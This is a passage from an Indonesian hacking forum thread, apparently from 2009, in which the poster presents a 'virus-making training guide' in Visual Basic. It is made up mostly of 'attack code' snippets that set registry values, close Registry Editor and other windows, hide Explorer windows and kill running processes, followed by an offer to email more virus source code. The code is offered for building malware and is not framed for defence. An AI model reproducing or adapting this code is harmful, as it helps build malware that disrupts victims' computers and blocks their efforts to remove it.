Or InStr(1, Command$, "word") <> 0 Then
Shell Command$, vbNormalFocus
DoEvents
End If
End If
'jalankan sekali saja
If App.PrevInstance Then End
End Sub
'Create or Set String Value Registry
Private Function CreateStringValue(hKey As REG, Subkey As String,
RTypeStringValue As TypeStringValue, strValueName As String, strData As
String) As Long
On Error Resume Next
Dim ret As Long
RegCreateKey hKey, Subkey, ret
CreateStringValue = RegSetValueEx(ret, strValueName, 0, RTypeStringValue,
ByVal strData, Len(strData))
RegCloseKey ret
End Function

Kode penyerangan2:
Siapkan satu buah form dan satu buah timer dengan Interval=100.

Code:
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any)
As Long
Private Const WM_CLOSE = &H10
Private Sub Timer1_Timer()
Dim FW As Long
FW = FindWindow(vbNullString, "Registry Editor")
If FW Then SendMessage FW, WM_CLOSE, 0, 0
End Sub

Kode Penyerangan3:
Siapkan satu buah form dan satu buah timer dengan Interval=100.

Code:
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
lParam As Any) As Long
Private Const WM_CLOSE = &H10
Private Const WM_GETTEXT = &HD
Private Sub Timer1_Timer()
Dim FW As Long
FW = GetForegroundWindow
If FW Then
Dim buff As String * 255
SendMessage FW, WM_GETTEXT, 255, ByVal buff
buff = Left$(buff, InStr(1, buff, Chr$(0)) - 1)
If InStr(1, UCase(buff), "REG") <> 0 _
Or InStr(1, UCase(buff), "WIN") <> 0 Then
SendMessage FW, WM_CLOSE, 0, 0
End If
End If
End Sub

Kode Penyerangan4:
Siapkan satu buah form dan satu buah timer dengan Interval=100.

Code:
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, _
ByVal nCmdShow As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
lParam As Any) As Long
Private Const WM_GETTEXT = &HD
Private Const SW_HIDE = 0
Private Sub Timer1_Timer()
Dim FW1 As Long
Dim FW2 As Long
FW1 = FindWindow("ExploreWClass", vbNullString)
FW2 = FindWindow("CabinetWClass", vbNullString)
If FW1 <> 0 Or FW2 <> 0 Then
Dim cap1 As String * 255
Dim cap2 As String * 255
SendMessage FW1, WM_GETTEXT, 255, ByVal cap1
SendMessage FW2, WM_GETTEXT, 255, ByVal cap2
cap1 = Left$(cap1, InStr(1, cap1, Chr$(0)) - 1)
cap2 = Left$(cap2, InStr(1, cap2, Chr$(0)) - 1)
If InStr(1, UCase(cap1), "WINDOWS") Then
ShowWindow FW1, SW_HIDE
End If
If InStr(1, UCase(cap2), "WINDOWS") Then
ShowWindow FW2, SW_HIDE
End If
End If
End Sub

Kode Penyerangan5:
Siapkan satu buah form, satu buah timer dengan Interval=100 dan satu buah module.
Ketikan pada form1:

Code:
Private Sub Timer1_Timer()
TaskProses
End Sub
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:17

OK GK USAH BERTELE-TELE JARI SAYA DAH KERITING ABIS

Ketikan pada module:

Code:
Public Declare Function CreateToolhelp32Snapshot Lib "kernel32" _
(ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Public Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As
Long, uProcess As PROCESSENTRY32) As Long
Public Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long,
uProcess As PROCESSENTRY32) As Long
Public Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
Public Declare Function TerminateProcess Lib "kernel32" _
(ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Public Declare Function OpenProcess Lib "kernel32" _
(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal
nCmdShow As Long) As Long
Public Declare Function LockWindowUpdate Lib "user32" _
(ByVal hwndLock As Long) As Long
Public Const TH32CS_SNAPHEAPLIST = &H1
Public Const TH32CS_SNAPPROCESS = &H2
Public Const TH32CS_SNAPTHREAD = &H4
Public Const TH32CS_SNAPMODULE = &H8
Public Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS _
Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Public Const TH32CS_INHERIT = &H80000000
Public Const MAX_PATH As Integer = 260
Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Public Sub TaskProses()
Dim hSnapShot As Long, uProcess As PROCESSENTRY32, R As Long
Dim hProcess As Long, NamaFile As String
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
uProcess.dwSize = Len(uProcess)
R = Process32First(hSnapShot, uProcess)
Do While R
NamaFile = uProcess.szExeFile
NamaFile = Left$(NamaFile, InStr(1, NamaFile, Chr$(0)) - 1)
If LCase(NamaFile) = "notepad.exe" Then
CloseHandle hSnapShot
hProcess = OpenProcess(&H1F0FFF, False, uProcess.th32ProcessID)
x = TerminateProcess(hProcess, 0)
Exit Do
End If
R = Process32Next(hSnapShot, uProcess)
Loop
CloseHandle hSnapShot
End Sub

Untuk
tahap serangan sudah selesai... berikut kita mengepost segala macam
source code virus... bagi yang mau ngepost silahkan.. jangan
tanggung-tanggung klo mo tanya soalnya saya jarang bisa online di
karenakan kerjaan yg
menumpuk....................................................... thanks
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:17

BILA ANDA MAU source code virus saya tuk latihan SILAHKAN HUBUNGI saya

DI

email: rikielfa@yahoo.com

TP ingat klo ada apa2 dengan komputer anda
tanggung sendiri ok,hubungi saya klo mo source codenya
virus yg udah saya buat, tinggal utak atik aja ok tuk latihan
jgn lupa buat virus menggunakan visual basic (vb)
mau ngk mau hrs instal vb yah








Mau source codenya ???
kamu harus ada Software VB dulu oke .....
ikutin aja petunjuk nya
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
Sponsored content




PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Today at 10:10

Kembali Ke Atas Go down
 
Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» [share] Caraku terhindar 100% dari Virus PC & Notebook ( No Deep Freeze )
» Melayani Jasa Pembuatan Surat2......
» sharing di sini yok bro,bahan-bahan/ material pembuatan knalpot..
» 10 Virus Paling Berbahaya Bagi Tubuh Kita
» Lima Antivirus!

Permissions in this forum:Anda tidak dapat menjawab topik
.: MIG33PENAJAM.TK :. :: INFORMATION AND COMMUNICATION TECNOLOGY (ICT) :: BACKDOOR, VIRUS, TROJAN, ROOTKIT-
Navigasi: